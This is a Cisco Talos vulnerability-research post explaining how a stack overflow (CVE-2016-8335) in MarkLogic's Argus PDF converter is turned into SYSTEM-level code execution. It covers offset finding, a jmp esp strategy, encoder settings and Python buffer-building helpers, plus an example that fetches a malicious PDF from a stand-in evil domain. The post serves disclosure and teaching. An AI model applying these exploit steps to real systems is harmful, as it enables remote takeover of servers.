Deep Dive in MarkLogic Exploitation Process via Argus PDF Converter

This post was authored by Marcin Noga, with contributions from William Largent.
Talos discovers and responsibly discloses software vulnerabilities on a regular basis. Occasionally we publish a deep technical analysis of how a vulnerability was discovered or of its potential impact. In a previous post Talos took a deep dive into Lexmark Perceptive Document Filters. In this post we focus on another converter used by MarkLogic: Argus PDF, located in the `Converters/cvtpdf` folder, which is responsible for converting PDF files to XML-based formats. We cover the technical aspects of both the discovery and the exploitation process via the Argus PDF converter.

How exactly does it affect MarkLogic?

Before getting into the details, watch this video. It shows remote code execution, tested on MarkLogic 8.0-5.5 on Windows, that obtains SYSTEM-level privileges!

The converter consists of the `convert` binary and the Argus PDF DLL. Both can be found in the MarkLogic directory at the following location:

How exactly can we force MarkLogic to use this converter? MarkLogic uses it each time the XDMP API function "pdf-convert" is called.

From the documentation’s description of this API:

Converts a PDF file to XHTML. Returns several nodes, including a parts node, the converted document xml node, and any other document parts (for example, css files and images). The first node is the parts node, which contains a manifest of all of the parts generated as result of the conversion.
Example usage, where the PDF we want to convert is read from an untrusted source:

xdmp:pdf-convert( xdmp:document-get("http://evildomain.localhost.com/malicious.pdf"), "malicious.pdf" )
When "pdf-convert" is called as above, the MarkLogic daemon spawns the "convert" binary. That binary loads Argus.dll, which converts the PDF into (X)HTML.

Increased damage

As in our previous exploitation example, newer versions of MarkLogic on Windows spawn the "convert" component without dropping privileges, so "convert" performs its tasks with SYSTEM privileges! This dramatically increases the impact of successful exploitation, because the attacker automatically gains the highest privileges on the system.

Recon

While researching this product, Talos found multiple vulnerabilities in the Iceni Argus PDF library. To demonstrate the exploitation process we will use CVE-2016-8335 (TALOS-2016-0202), Iceni Argus ipNameAdd Code Execution, which is a classic stack-based buffer overflow.

Linux version
First, let’s examine how the Linux version of this converter behaves when we attempt to convert our malformed PDF file:

In this case the `convert` binary has been compiled with stack cookies (stack-smashing protection), which would make exploitation more difficult. It is worth mentioning, though, that this mechanism can be bypassed under certain conditions. A great example is Bypassing MiniUPnP Stack Smashing Protection by Talos’ Aleksander Nikolic.

The presence of stack cookies, confirmed with checksec:

checksec also shows that, once again, the `convert` executable does not support ASLR (it is not built as a position-independent executable).
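On Linux, checksec's PIE result comes down largely to the ELF header's `e_type` field. A fixed-address executable (`ET_EXEC`) is always loaded at the same base, so its code cannot be randomized. The following is a minimal Python sketch of that single check, assuming a standard ELF header. It is not a replacement for checksec, which inspects more than this one field. The helper names are our own.

```python
import struct

ET_EXEC = 2  # executable linked for a fixed load address
ET_DYN = 3   # shared object; PIE executables also use this type


def elf_type(header: bytes) -> int:
    """Return the e_type field from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[EI_DATA] at offset 5: 1 = little-endian, 2 = big-endian
    endian = "<" if header[5] == 1 else ">"
    # e_type is a 16-bit field at offset 16 in both ELF32 and ELF64 headers
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type


def is_pie(header: bytes) -> bool:
    """ET_DYN suggests a randomizable base; ET_EXEC means a fixed base."""
    return elf_type(header) == ET_DYN


def check_file(path: str) -> str:
    """Read the ELF header of the file at `path` and report PIE status."""
    with open(path, "rb") as f:
        return "PIE" if is_pie(f.read(64)) else "No PIE"
```

For example, `check_file("path/to/convert")` (a hypothetical path) returns "No PIE" for a fixed-address binary like the one described above.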

NOTICE: In the Linux version, the Argus library is statically linked into the `convert` application.

Windows
OK, let’s check the Windows version:

Perfect: no stack cookies, so exploitation should be straightforward. For further information on the triage process, see the details in the advisory (TALOS-2016-0202). What follows is a summary of what went wrong and how to trigger this vulnerability.

Steps to Rule Them All

1. The vulnerability exists in the function `ipNameAdd`.
2. The vulnerable code:

Line 12 contains the buggy `strcpy` call.

3. An attacker who creates a `token` that is not a "regular" `Name object`, Integer, Float, or HexString can cause a stack-based buffer overflow, leading to arbitrary code execution.
4. An example PDF that triggers this vulnerability:

5. The overflowing "string" (chain of bytes) can contain any byte in the range [0x21-0xff] except 0x80.
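Step 5 is the constraint that every later part of the overflow (pattern, return address, shellcode) has to satisfy. Below is a minimal Python sketch of a checker for it. The set of allowed bytes is taken directly from step 5, and the function names are hypothetical, chosen for illustration.

```python
# Byte constraint from step 5: 0x21-0xff is usable, except 0x80.
ALLOWED = frozenset(range(0x21, 0x100)) - {0x80}


def bad_bytes(data: bytes) -> list:
    """Return the offsets of every byte outside the allowed set."""
    return [i for i, b in enumerate(data) if b not in ALLOWED]


def is_clean(data: bytes) -> bool:
    """True if every byte of the buffer satisfies the step 5 constraint."""
    return not bad_bytes(data)
```

Returning offsets rather than a plain yes/no makes it easy to see which part of a candidate buffer needs to change.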

We now have all the necessary information and can move on to the exploitation process.

Exploitation

Cyclic Pattern
How many bytes are needed to overwrite the RET address?

To find out, we use Immunity Debugger with mona.py. We generate a cyclic pattern and use it to replace the overflowing "AAAA..." string in our PDF.
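A cyclic pattern works because every 4-byte window in it is unique. Any 4 bytes that end up in EIP therefore identify exactly one offset. As far as we know, mona's `pattern_create` uses the same layout as Metasploit's: three-character units made of an uppercase letter, a lowercase letter and a digit (`Aa0Aa1...`). Here is a minimal Python sketch of generating that pattern and locating an EIP value in it. The function names mirror the mona commands but are our own.

```python
import string


def pattern_create(length: int) -> str:
    """Metasploit-style cyclic pattern Aa0Aa1...Zz9 (at most 20280 chars)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern is limited to 20280 characters")


def pattern_offset(eip: int, length: int = 20280) -> int:
    """Return where a 32-bit register value occurs in the pattern (-1 if absent).

    x86 is little-endian: the DWORD shown in EIP has its bytes reversed
    compared with their order in memory, and therefore in the pattern.
    """
    needle = eip.to_bytes(4, "little").decode("latin-1")
    return pattern_create(length).find(needle)
```

Every pattern character is alphanumeric, so the pattern itself already satisfies the [0x21-0xff] without 0x80 constraint and should pass through the vulnerable copy unchanged.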

Re-run our app:

Bingo! EIP has been overwritten with bytes from our cyclic pattern. Using the `!mona pattern_offset eip` command (short form `!mona po eip`), we find that the value in EIP sits at offset 260.

We can now build our proof-of-concept exploit by overwriting EIP with a value we control:
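The proof of concept's buffer layout is simply filler up to offset 260, followed by the 4-byte value to load into EIP. Below is a minimal Python sketch of that layout. It assumes the placeholder marker 0x42424242 ("BBBB") for EIP and a hypothetical helper name, `build_overflow`. Wrapping these bytes into the malformed PDF token is deliberately left out.

```python
import struct

EIP_OFFSET = 260  # offset reported by !mona po eip for this crash


def build_overflow(eip_value: int, tail: bytes = b"", filler: bytes = b"A") -> bytes:
    """Filler up to the saved return address, the new EIP, then optional tail bytes."""
    padding = (filler * EIP_OFFSET)[:EIP_OFFSET]
    # x86 is little-endian: the lowest byte of the address comes first in memory
    return padding + struct.pack("<I", eip_value) + tail


# Marker value: a crash with EIP == 0x42424242 ("BBBB") confirms control.
skeleton = build_overflow(0x42424242)
```

A recognizable marker in place of a real address makes the result unambiguous in the debugger. If EIP holds 0x42424242 at the crash, the offset is right.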

Building the Exploitation Strategy

We have the exploit skeleton and control of EIP. Now let’s check the loaded modules and the mitigations they implement, to get a clear picture of which path to take to exploit this case successfully.

Lack of mitigations?! NO DEP !!!

Do our eyes deceive us? The executable does not support DEP or ASLR, and neither mitigation is used by any of the loaded modules. That means you can put on your favorite song from the '90s, sit back, and once again enjoy the charm of direct-RET `jmp esp` exploits, now in 2017!
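Whether a Windows module opts into DEP and ASLR is recorded in the `DllCharacteristics` field of its PE optional header. Module-listing tools such as `!mona modules` summarize this field. The following minimal Python sketch reads the two relevant flags from a raw PE image. The helper names are ours, and the flag values and field offsets follow the PE format.

```python
import struct

DYNAMIC_BASE = 0x0040  # image can be relocated at load time (ASLR)
NX_COMPAT = 0x0100     # image is marked compatible with DEP


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE32 or PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # skip the signature and the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both optional header variants
    (flags,) = struct.unpack_from("<H", image, opt + 70)
    return flags


def mitigations(image: bytes) -> dict:
    """Report which of the two mitigations the image opts into."""
    flags = dll_characteristics(image)
    return {"ASLR": bool(flags & DYNAMIC_BASE), "DEP": bool(flags & NX_COMPAT)}
```

These flags only record whether an image opts in. The system-wide DEP and ASLR policy can still change what happens at run time.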

Direct-RET

Generally, we just need to find a `jmp esp` instruction while keeping our constraints in mind:

We use `-x *` because we don't care whether the page has the X (executable) permission set: with DEP disabled, code on a non-executable page runs anyway. Our pointer is also subject to the byte constraints. To keep things simple, we restrict it with `-cp alphanum` and exclude 0x20 with `-cpb \x20`.
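The `-cp alphanum` and `-cpb \x20` criteria filter candidate pointers by the bytes of the address itself. Below is a minimal Python sketch of the same filter. It rests on our reading that `alphanum` means every byte of the little-endian pointer is in [0-9A-Za-z], and `pointer_ok` is a hypothetical name.

```python
import string

ALNUM = frozenset(map(ord, string.ascii_letters + string.digits))


def pointer_ok(addr: int, excluded: bytes = b"\x20") -> bool:
    """True if every byte of the 32-bit pointer is alphanumeric and not excluded."""
    raw = addr.to_bytes(4, "little")  # byte order as the pointer appears in memory
    return all(b in ALNUM and b not in excluded for b in raw)
```

An alphanumeric pointer automatically satisfies the [0x21-0xff] without 0x80 rule from step 5. Because 0x20 is not alphanumeric, the explicit 0x20 exclusion only matters if the alphanum criterion is later relaxed.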

Shellcode
The same constraints apply during shellcode generation:

It is worth noting that we need to tell the encoder where our shellcode starts. In our case that address is held in the ESP register. After `ret` pops the overwritten return address, ESP typically points just past it, which is where `jmp esp` lands. We pass that information to the encoder via "BufferRegister=ESP".
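Why does the encoder need this hint? Our explanation assumes a Metasploit alphanumeric encoder such as x86/alpha_mixed, which is where the BufferRegister option comes from. Without a register that already holds the shellcode's address, a decoder stub has to discover its own location ("GetPC"), and the usual GetPC sequences contain non-alphanumeric bytes. The minimal Python sketch below checks two well-known x86 GetPC sequences against an alphanumeric filter. The dictionary and function names are illustrative.

```python
import string

ALNUM = frozenset(map(ord, string.ascii_letters + string.digits))

# Two well-known x86 GetPC sequences a self-locating decoder could use.
GETPC_STUBS = {
    # call the next instruction, then pop the return address it pushed
    "call $+5; pop eax": bytes.fromhex("e800000000" "58"),
    # fnstenv stores the FPU environment, whose FPU instruction pointer
    # (the address of fldz) lands at [esp] and is then popped
    "fldz; fnstenv [esp-0xc]; pop ecx": bytes.fromhex("d9ee" "d97424f4" "59"),
}


def is_alphanumeric(code: bytes) -> bool:
    """True if every byte is in [0-9A-Za-z]."""
    return all(b in ALNUM for b in code)


for name, code in GETPC_STUBS.items():
    # both stubs report alphanumeric=False
    print(f"{name:34} alphanumeric={is_alphanumeric(code)}")
```

Since neither sequence survives the alphanumeric constraint, pointing the decoder at a register that already holds the start address (ESP here) sidesteps the problem.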

PoC

Now we can test our exploit:

Summary

This deep dive provides a clear view into the process of taking a vulnerability and weaponizing it into a usable exploit. Just because a vulnerability exists does not mean that it is easily weaponized; in most circumstances the path to weaponization is arduous. However, depending on the methodology required to actually exploit it, successful weaponization can also significantly increase the value of the vulnerability. Cisco Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis, including further deep-dive analyses.

Cisco Talos Blog
